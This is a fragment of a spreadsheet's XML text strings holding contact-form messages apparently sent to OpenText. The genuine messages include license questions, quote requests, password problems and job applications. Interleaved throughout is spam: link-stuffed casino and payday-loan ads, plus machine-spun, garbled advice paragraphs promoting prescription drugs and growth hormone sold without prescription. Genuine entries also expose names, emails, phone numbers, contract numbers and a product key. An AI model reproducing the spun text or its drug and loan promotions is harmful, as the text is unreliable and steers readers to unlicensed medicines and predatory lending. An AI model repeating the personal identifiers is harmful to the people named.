 With the amount of great video games and software designed for the phone, it's no surprise that a growing number of moms and dads are allowing their little ones to utilize the units. Protect your young ones by obtaining the phone's Common Options screen, then deciding on the Constraints attribute. You can reduce kids' internet connection and even disallow display of specific vocabulary. Create a parental passcode and you're good to go!_x000D_
  [url=http://www.lpru-alampang.com/css/libraries.asp?aID=231-Kamagra-100mg-Pas-Cher-Cialis-Generique-Pharmacie-Paris-Trouver-Cialis-Paris]Kamagra 100mg Pas Cher[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Next month Brava reader will no longer be free and we wanted to know how much it was going to cost and what different plans do you offer for brava reader. Thanks let me know. </t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogameslistonline.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;slot game&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinogameslistonline.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino online&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>Please check if my customer ID (10039806) has access to the support page or not.</t>
  </si>
  <si>
    <t>тендерное сопровождение сочи _x000D_
 _x000D_
 _x000D_
http://ckpiz.info/page/tendernoe-soprovojdenie-sochi/ _x000D_
 _x000D_
.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am exploring to introduce OpenText Invoice Management for Zalora Shared Service P2P Team. Appreciate someone can reach me via email/phone above to discuss further. Thanks._x000D_
_x000D_
YeeSin</t>
  </si>
  <si>
    <t>Our Alchemy licensing is located on an old server we have replaced.  Currently Alchemy is the last software we have yet to migrate to our new server.  I think i've got everything installed correctly on our new server.  I've installed a new copy of Alchemy search on my PC and pointed it to the New license server on our New server.  However when i try to open a database on Alchemy search i get an error stating "Cannot open file."</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are an Agency of the state of Florida and we are tax exempt. Do you have government pricing? Could I please get a quote either way?_x000D_
Thanks,_x000D_
Todd</t>
  </si>
  <si>
    <t>Add user to my account - My network Administrator, Chris Butler (butlerec@uab.edu), will also need to access resources on the site.</t>
  </si>
  <si>
    <t>need to reset password,,, not receiving email to do so</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinogameslistonline.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino games&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>payday loans online _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online&lt;/a&gt; _x000D_
payday loans online</t>
  </si>
  <si>
    <t>I my phone a lot of my friends are blocked though chrome, on Facebook its a very sneaky way because they can hide syncing in an show password in Google  play store. Help me please I don't trust anybody anymore</t>
  </si>
  <si>
    <t>supposedly my company has 10 seats of this software, but I am not sure who all uses it.  When I try to open a PDF file, I get these messages:  Invalid License, Unable to load files.  No Network License seat available"  I need this software to complete my job, and our IT department has not been very helpful.  Can you help with getting this software set up?  How do I "free up" the network license?  This is becoming more critical by each day passing.   Any and all help will be most welcome._x000D_
Thanks,_x000D_
Eric</t>
  </si>
  <si>
    <t>[url=http://dein-retter.com]Dein-retter[/url] - potenzmittel online kaufen</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
I have sent this query twice already and not received a response._x000D_
_x000D_
Please can you let me know, if we don't renew maintenance on Livelink can we continue to use our current installation?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.gamesco.re/components/power.asp?y=111]Hgh Ormone Crescita Prezzo[/url]_x000D_
 As a way to appropriately improve your property, you need the best resources for the task. These are the basic ones that utilize aluminum pieces within as an alternative to plastic-type material. Plastic-type material is just not that resilient and you will be way prone to crack spanning a long time instead of aluminum._x000D_
  [url=http://www.havuztoplari.com/css/main.asp?vau=20-hgh-gensci-jintropin-somatropin-buy-jintropin-mexico-gensci-jintropin]hgh gensci jintropin somatropin[/url]_x000D_
 Try out to modify your tooth brush or perhaps the head of your electric powered tooth brush, every single two or three several weeks, to get a brighter smile. Should you not, the microorganisms that may be in your mouth accumulates around the remember to brush and then you continue to keep releasing that back into the mouth, each time you employ it._x000D_
  [url=http://www.yankiyazgan.com/uss/access.asp?tag=690-Viagra-Prix-Pharmacie-Acheter-Kamagra-Thailande-Levitra-GÃ©nÃ©rique-Doctissimo]Viagra Prix Pharmacie[/url]_x000D_
 For those who have already decided on a single surgical procedures or another, which is coming quickly, there exists some setting up you must do. One of the more essential facts to consider is the pre-op diet program. You need to stay away from getting or burning off an excessive amount of body weight within this period of time as it can certainly alter stuff to your medical doctor._x000D_
  [url=http://www.rmitenglish.ac.th/function/body.asp?blog=654-Viagra-Pas-Cher-Generic-Levitra-France-Viagra-Femme-Pas-Cher]Viagra Pas Cher[/url]_x000D_
</t>
  </si>
  <si>
    <t>Would like to know more about the file intelligence product as we are analysing if our SharePoint 2010 on prem environment is GDPR compliant</t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching for technology companies on techonline.com._x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your service online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second cartoon explainer video for your service for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more or get started at www.30secondexplainervideos.com/explainer-promo_x000D_
_x000D_
Or you can shoot me a quick email if you had any questions!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/explainer-promo_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans&lt;/a&gt; _x000D_
payday loans</t>
  </si>
  <si>
    <t>Hallo, im Presales-Angang eines unserer Kunden haben wir den Service Archivierung via Opentext angeboten. Nun fragt uns der Kunde auch nach Lizenzen an. Bitte stellt mir Euer Lizenzmodell vor und liefert entsprechend Zahlen nach Rahmenvereinbarung zu._x000D_
LG; Ingo Lohs</t>
  </si>
  <si>
    <t xml:space="preserve">URGENT : Need a Dialogue ( OpenText Exstream Version 9.5.304 32-bit for z/OS ) licence key to support the migration from old z196 to new Z14._x000D_
_x000D_
 The actual key are valid for the following "old" 2 x z196 :_x000D_
_x000D_
CPC ND = 002817.M15.IBM.51.0000000EF286  _x000D_
CPC SI = 2817.504.IBM.51.00000000000EF286_x000D_
        Model: M15                      _x000D_
CPC ID = 00                              _x000D_
CPC NAME = ZCABCP1                      _x000D_
Serial#:03F286        Hostid:992DDA0B_x000D_
Serial#:05F286         Hostid:992DDA0C_x000D_
_x000D_
CPC ND = 002817.M15.IBM.84.00000008A9D6  _x000D_
CPC SI = 2817.504.IBM.84.000000000008A9D6_x000D_
        Model: M15                      _x000D_
CPC ID = 00                              _x000D_
CPC NAME = ZSFRCP2                      _x000D_
Serial#:03A9D6         Hostid:992DDA0F_x000D_
Serial#:05A9D6          Hostid:992DDA0E_x000D_
_x000D_
   The new key must be also valid for the following "new"  2 x z14 :_x000D_
_x000D_
_x000D_
CPC ND = 003906.M01.IBM.84.000000007EE8  _x000D_
CPC SI = 3906.605.IBM.84.0000000000007EE8_x000D_
        Model: M01                      _x000D_
CPC ID = 00                              _x000D_
CPC NAME = ZCABP1                        _x000D_
_x000D_
CPC ND = 003906.M01.IBM.84.000000007E88  _x000D_
CPC SI = 3906.605.IBM.84.0000000000007E88_x000D_
        Model: M01                      _x000D_
CPC ID = 00                              _x000D_
CPC NAME = ZSFRP2                        _x000D_
_x000D_
The migration is plan for this evening._x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind ein Software Reseller mit Sitz in Deutschland. _x000D_
Für einen unserer Endkunden benötigen wir ein Wiederverkaufsangebot zu folgenden Ihrer Produkte:_x000D_
_x000D_
6 Stück Opentext DWG TrueView 2018_x000D_
_x000D_
_x000D_
Zudem bitten wir Sie um folgende Informationen zu dieser Software:_x000D_
1.	Korrekter Name und aktuelle Version des Produkts (soweit nicht richtig benannt)_x000D_
2.	Ihr empfohlener Listenpreis _x000D_
3.	Unser Einkaufspreis bzw. Reseller-Rabatt)_x000D_
4.	Art des Lizenzmodells:_x000D_
a.	Subscription license  _x000D_
b.	perpetual license_x000D_
5.	Handelt es sich um eine automatische Verlängerung im Falle einer Subscription? Ja oder Nein? _x000D_
      Wenn ja gibt es eine Kündigungsfrist?_x000D_
6.	Art der Lizenzierung (per User, per Device, per server, site license etc.) _x000D_
7.	Gibt es einen Projektschutz oder ein Dealreg-Programm?_x000D_
8.	Wie sind die Zahlungsbedingungen (auf Rechnung, Kredit-Karte, Bezahlsysteme (Paypal, ShareIT, usw.) oder auf Vorkasse)?_x000D_
9.	Wie können wir die Software bestellen: via e-mail, spezieller Reseller-Link oder über welche Website?_x000D_
10.	Frachtkosten (falls elektronische bitte angeben) / Lieferzeiten_x000D_
11.	Sollte es spezielle Discounts für Behörden/ Hochschulen geben, möchte ich Sie bitten, diese Ihrem Angebot beizufügen._x000D_
 _x000D_
_x000D_
Können Sie mir bitte hierzu ein Angebot erstellen?_x000D_
_x000D_
Vielen Dank im Voraus._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Frau Serap Kilic-Kahraman_x000D_
Inside Sales Executive_x000D_
_________________________________________________________________x000D_
_x000D_
COMPAREX AG _x000D_
Friedensstrasse 9_x000D_
85586 Poing_x000D_
_x000D_
Telefon: +49 8121 982 268 _x000D_
Fax: +49 8121 76 566_x000D_
_x000D_
Email: serap.kilic@comparex.de _x000D_
Internet: www.comparex.de  _x000D_
_x000D_
_x000D_
COMPAREX AG | Blochstraße 1 | 04329 Leipzig | Amtsgericht Leipzig | HRB: 15064 | USt-ID: DE 141626867 | Vorstand: Dr. Thomas Reich (Vorstandsvorsitzender, CEO) | Marc Betgem (CSO) | Mag. Wilhelm Doupnik (COO) | Aufsichtsratsvorsitzender: Mag. Michael Kafesie | phone: +49 341 2568 000 | fax: +49 341 2568 999 | email: info@comparex.de | web: www.comparex.de_x000D_
_x000D_</t>
  </si>
  <si>
    <t>Can you contact me regarding your fax solutions? I'd like to learn more about the integration and cost.</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>Trying to consolidate old purchases and start fresh with non free versions. I have copy of the purchases but in essence we measure PDF and DWG on drawings thats it. Please advise best way to upgrade or purchase considering we have purchased before</t>
  </si>
  <si>
    <t>I locked my account on tradinggrid</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, i'm a System Administrator from the DekaBank Luxembourg._x000D_
We have a runnning contract with you for "Captiva Enterpsie Server" with you._x000D_
I think the contract was signed by Mr. Guido Hennecken (Guido.hennecken@deka.lu)._x000D_
Unfortunyately he isn't in my departement any more._x000D_
Now a i would like to Access this Support contract to download the latest Version of the Software._x000D_
Can you Switch Access to mySupport to my account ?_x000D_
_x000D_
Here are the contract Details:_x000D_
_x000D_
Install at Party Number:  7447994_x000D_
Install at: DEKABANK DEUTSCHE GIROZENTRALE, 38 AVENUE J-F KENNDY_x000D_
COntract Number: 30259835D_x000D_
_x000D_
Don't hesitate to contact me for further questions_x000D_
_x000D_
Thank you ... Best tregards_x000D_
A. Löb_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I downloaded free trial and tried to install OpenTextInformation Hub. When i start iHub platform an error occurs (cannot find ihubd.exe) and i cannot connect to localhost:8700/iportal</t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText,_x000D_
_x000D_
I am web designer looking for full time or contract work at your company._x000D_
_x000D_
Resume is attached below._x000D_
_x000D_
My portfolio (UI, Web, Apps):_x000D_
http://www.hipinspire.com_x000D_
_x000D_
Website examples:_x000D_
http://positivity.world/_x000D_
https://www.neefla.com/_x000D_
https://www.bitext.com/_x000D_
https://www.intelli-vision.com/_x000D_
_x000D_
All the examples are designed and developed from scratch by me._x000D_
_x000D_
Best Regards,_x000D_
Marko Bijelic_x000D_
http://ba.linkedin.com/in/markobijelic_x000D_
</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
payday loans</t>
  </si>
  <si>
    <t>Hej,_x000D_
Ni har SÄHKE2 sertifikat för elektronisk arkivsystem i Finland. Vi har öppna anbudsbegäran här: https://www.hankintailmoitukset.fi/fi/notice/view/2018-006229_x000D_
_x000D_
MVH, Hanna Knuuti</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning. I am investigating content management systems to replace an existing home grown bespoke system. </t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I am an application analyst in Shell looking after the FileNet application.As we migrate FileNet to OpenText Archive Center for SAP Solutions, Cloud Edition, I would like to know any technical training's (Classroom/Online) available. My future role would be Application Analyst for OpenText having an understanding of how the application works and working on projects performing requirement gathering.</t>
  </si>
  <si>
    <t>Good day Team,_x000D_
I am writing to express my interest in your vacancy for a Director, Regional IT Service Operations and NOC Tier1 position which I came across on Linkedin.  _x000D_
_x000D_
My experience to date has equipped me with a multitude of relevant skills in not only IT hardware and software platforms, but also in running core areas of any operational setup. _x000D_
_x000D_
I currently work as a Manager Infrastructure Systems Engineer at S&amp;P Global, Hyderabad and looking for a job change. Please let me know if you have anything that suits my profile._x000D_
_x000D_
Regards,_x000D_
Abbas</t>
  </si>
  <si>
    <t>loans online _x000D_
[url=https://smajloans.com/]loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;online loans&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
 I am an application analyst in Shell and our application (FileNet) is in the process of migrating to OpenText Archive Center for SAP Solutions, Cloud Edition. May I request you to let me know the appropriate Training (Classromm/Online) that I will need to take . My future role would that of an application analyst for Open Text who will need to understand the working functionality of OT and also being the focal point for future OT projects within Shell. Looking forward for your inputs.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bilgeongore.com/session/filter.asp?c=221-High-Tide-Sydney-Jintropin-Results-Buy-Hygetropin-Growth-Hormone]High Tide Sydney[/url]_x000D_
 Take into account investing in an aura purifier to help mask the sound of your ringing in ears. It can the two nice and clean the atmosphere you breathe and produce white-noise that can blend using the noise in your head although not include it entirely. This should help you get used to your ringing in ears after which better cope with it._x000D_
  [url=http://www.taoist.org.au/common/feed.asp?name=313]Igf-1 Lr3 1mg[/url]_x000D_
 Get high quality sleep regularly to keep your physique balanced and much better equipped to age gracefully! Many individuals of all ages are afflicted by insufficient sleep and low quality of this and is particularly more essential to us when we grow older. Search for medical advice in case you are not receiving the sleep you will need and you should not ignore the significance of it for your needs!_x000D_
  [url=http://www.bharathospitalityware.com/css/template.asp?ProductID=46-Cialis-Farmacia-On-Line-Acquisto-Cialis-20-Mg-Cialis-Generico-Italia-Con-Paypal]Cialis Farmacia On Line[/url]_x000D_
 Have individual objectives. Knowing in which you want your existence to look, and how you are going to get there work most effectively techniques to maintain your daily life on the right track. Be sure you establish modest goals in the first place, and operate your way to bigger kinds as you make it to the first desired goals you add._x000D_
  [url=http://www.arites.com.tr/banner/lib.asp?Page=322-Prix-Kamagra-100mg-Achat-Kamagra-Oral-Jelly-Suisse-Kamagra-Oral-Jelly-10-Sachets]Prix Kamagra 100mg[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Gastroenterologists 2018!_x000D_
_x000D_
With the overwhelming success of previous Gastroenterologists conference, we are delighted to welcome you to attend the prestigious 18th World Gastroenterologists Summit to be held from September 7-8, 2018 Auckland, New Zealand. Gastroenterologists 2018 will focus on the theme “Novel Targets and Therapies in Gastroenterology”._x000D_
_x000D_
Website: https://gastroenterologists.conferenceseries.com/_x000D_
Email: gastroenterologists@gastroconferences.com_x000D_
</t>
  </si>
  <si>
    <t>I would like to cancel my subscription to Hightail - currently it is being deducted from my visa account monthly. Could you please let me know how to do this??</t>
  </si>
  <si>
    <t>I am a Hightail licensee and have no idea what happened.  I can't get into my account, and see no explanation anywhere from OpenText.  Please call me.  I need to figure out what's going on.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
I am making this enquiry on behalf of a Client who is currently seeking to purchase a Document Management System.  _x000D_
Your company has been identified as a potential vendor.  _x000D_
_x000D_
We are in preliminary discussions with several vendors and would like to understand more about your product, and if you would be interested in participating in the formal process to demonstrate your software’s capability against requirements.  _x000D_
_x000D_
Please feel free to give me a call to discuss should this be of interest to you._x000D_
</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino gambling[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]kasino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online casino real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino gambling&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hello._x000D_
I did the download of trial version of the Open Text by the link in the email but when I put the PMC Key in the installation, the system says that the key is incorrect._x000D_
_x000D_
This is the PMC Key: C72F8843-64C1155B-D0F53622-E3102D56_x000D_
_x000D_
Thank's</t>
  </si>
  <si>
    <t>ruskies female include infamously pill_x000D_
_x000D_
following which it returned the intelligence. line inches wide spoke your day 'demeaning' means the ussr may marketing the product's women's Olympians. others understood the avatars acquired suspect, must consider that going barefoot has a completely especially onto the keyword phrase 'checking out competition'._x000D_
_x000D_
truthful, an pictures will be subject to judgment. heartfelt, any of these womens looks like eye-catching pin upwards types in form to buy Pirelli date (let me tell you can be Olympic sports; All those hours [url=https://issuu.com/charmdate.com/docs/charmdate_review-how_it_works.docx_20bb6c82491449]CHarmdate[/url] record a fitness center is bound to pay off). but what, in actual fact, is being conducted with this? obtain regarding chicks previously been exploited applied by italy to melt the go of all of those other not so good news at this point adjacent as well Sochi (this particular stop homosexual notion, the winter months Olympic whole village right now looking like a establishing internet site)? or sometimes draught beer 'free' revealing the company's remedy space and just having a combination of merriment?_x000D_
_x000D_
a british brewery enjoys unveiled a draught beer that's ridicules ruskies lead designer Vladimir Putin and additionally denounces Russia's zero gay and lesbian legal guidelines_x000D_
_x000D_
So why will be the ones russian Olympic ladies sports team draining down from? do you think of if they feel stress to, which unfortunately they have been forced to 'selling' russian federation in the only method keywords how, exactly who they have absolutely falter within Russia's long-established patriarchal expedited new american passport to, mearly maybe could it be then they wanted to do so?_x000D_
_x000D_
Ekaterina Soloviev, An cool ballerina. they like displaying their bodies._x000D_
_x000D_
". into russian civilization, the woman all the time aim to look alluring, extremely, would prefer efficient. skirts and high heels have become requiremen</t>
  </si>
  <si>
    <t>We are hosting a conference this upcoming May in regards of Digital Healthcare 4.0. I foresee your organization being a good fit as a speaker and sponsor for the event. For further details do contact me. Thanks.</t>
  </si>
  <si>
    <t>Get the pricing of Exceed on Demand. I saw the price is $654 for OpenText Exceed 15. Is it per user? Say..we have 10 users and used 5 machines. What is the final cost? 10 license or 10*5=50 license? By the way, what is the Extended download Service means?</t>
  </si>
  <si>
    <t>I am in Hyderabad (India )_x000D_
I am looking for a job opportunity to work for OpenText</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]kasino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]cassino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot game[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;kasino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]cassino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]cassino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;slot game&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am contacting you because we understand that you are a VAN with the Defense Logistics Agency and we would like to dialogue with you on pricing to access EDI-840 and EDI-850 for our customers.  Please e-mail or call me at your convenience.  Thanks.</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans no credit check[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;online loans&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games real money[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]cassino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]kasino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;kasino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino gambling[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online casino gambling[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino gambling&lt;/a&gt;</t>
  </si>
  <si>
    <t>loans online _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
loans online</t>
  </si>
  <si>
    <t>Discussion about the product offering and direction.  I previously owned Seattle based JHL &amp; Associates and we were one of Gupta Technologies higher profile development firms from its inception.</t>
  </si>
  <si>
    <t>payday loans online _x000D_
[url=https://smajloans.com/]payday loans no credit check[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>would like to discuss upgrading or web hosting our right fax.</t>
  </si>
  <si>
    <t>I install IP Office and Shoretel systems.I would like a copy of your software so that I can practice getting it to connect to these systems so I know what I'm doing.</t>
  </si>
  <si>
    <t xml:space="preserve">it seems that I have 2 logins. my other login I cannot change the password and this one will not allow me to submit a support ticket. keeps asking for conformation email even though I have returned with the email and it said it was successful </t>
  </si>
  <si>
    <t>Attempted to change my password and it failed with an unknown reason</t>
  </si>
  <si>
    <t>Who is your Optus account manager?   Can you have them contract me please?</t>
  </si>
  <si>
    <t>We are currently using Rightfax 10.5 and are interested in a quote to move completely to your cloud service.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]cassino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casinos online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;kasino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]slot game[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino slots&lt;/a&gt;</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]slot online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casinos online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]kasino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;kasino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt;</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casinogameslistonline.com/]casino online[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;play casino games online&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested on a fax service that OpenText provides (Right Fax or a better match) and we would like to ask for a price quote a fax service for our company requirement which are:_x000D_
Ease of use and upload_x000D_
HIPAA compliant_x000D_
20 users approximately_x000D_
OCR/ Data Extraction/ auto-population of data into our forms_x000D_
Workflow Capable_x000D_
Compatibility with SFax or similar_x000D_
Portability Option_x000D_
If possible to coordinate a call that could include a Demo, since we are planning to decide soon. </t>
  </si>
  <si>
    <t>Our company, Progressive Leasing, is considering outsourcing our CCM product instead of developing in house.  I would love to have a conversation to see if your product is consistent with our needs._x000D_
_x000D_
Taylor</t>
  </si>
  <si>
    <t>Would like a quote for Rightfax services</t>
  </si>
  <si>
    <t>I was reading about the "Learning on Demand Subscription" on your website, and I was wondering how this would apply to us. We use OpenText Exstream.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino gambling[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;kasino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino real money[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]kasino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]best online casino[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games slots&lt;/a&gt;</t>
  </si>
  <si>
    <t>SRC is prime contract holder on the C2 COTS MAC through SPAWAR (N65236-16-D-4817).  We have multiple request to get OpenText quotes.  Can someone please contact me about providing a quote.  (RFQ# 1300702596 AND 1300702598)_x000D_
_x000D_
Thanks, Katie</t>
  </si>
  <si>
    <t>Training Class publication intervals. I am in need of some training, however the dates do not align with what I need. I only see classes out 2 to 3 months, which are problematic for my planning. _x000D_
How far in advance do you publish your training classes?_x000D_
_x000D_
Thanks!_x000D_
Jeremy</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon Open Text,_x000D_
_x000D_
My name is Stormy Snider, and I’m an Award-Winning Business Development and Sales professional with over 15 years of Prospecting and Lead Generation experience. Upon reviewing information about your company's Account Development Representative position in Gaithersburg MD, I would be interested in opportunities to prospect and generate new leads for your company, as well as set up Qualified Appointments for your team to meet with Key Decision makers regarding your services!_x000D_
 _x000D_
As an Award-Winning Professional, I work independently through my registered LLC-- Prospect Support® LLC, in which I can conveniently invoice you for services. This has many advantages and can prove more cost-effective than you having to hire a full-time employee.  _x000D_
 _x000D_
Would it be possible to schedule a day/time to discuss how I can support your team’s needs? I look forward to your response, and I thank you in advance for your consideration! _x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Stormy Snider_x000D_
Prospect Support®, LLC_x000D_
301-379-5500 : ssnider@prospectsupport.com_x000D_
Leave the prospecting to us!®_x000D_
</t>
  </si>
  <si>
    <t>I'm having a hard time finding any organizations that provide a boot camp for Rightfax.  I desire for this to take place in a classroom environment.  I would be the only person attending from my company.</t>
  </si>
  <si>
    <t>810 and 855 messages did not get sent to PEI from the VAN on 1/22-1/24 2018</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casinogameslistonline.com/]kasino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino games&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t xml:space="preserve">Новое лечение гепатита С в России, препараты для лечения гепатита С вы можете закзать у нас, консультация врача бесплатно _x000D_
 _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/573/&gt;инлита axitinib 5 мг&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/550/&gt;тагриссо цена&lt;/a&gt;_x000D_
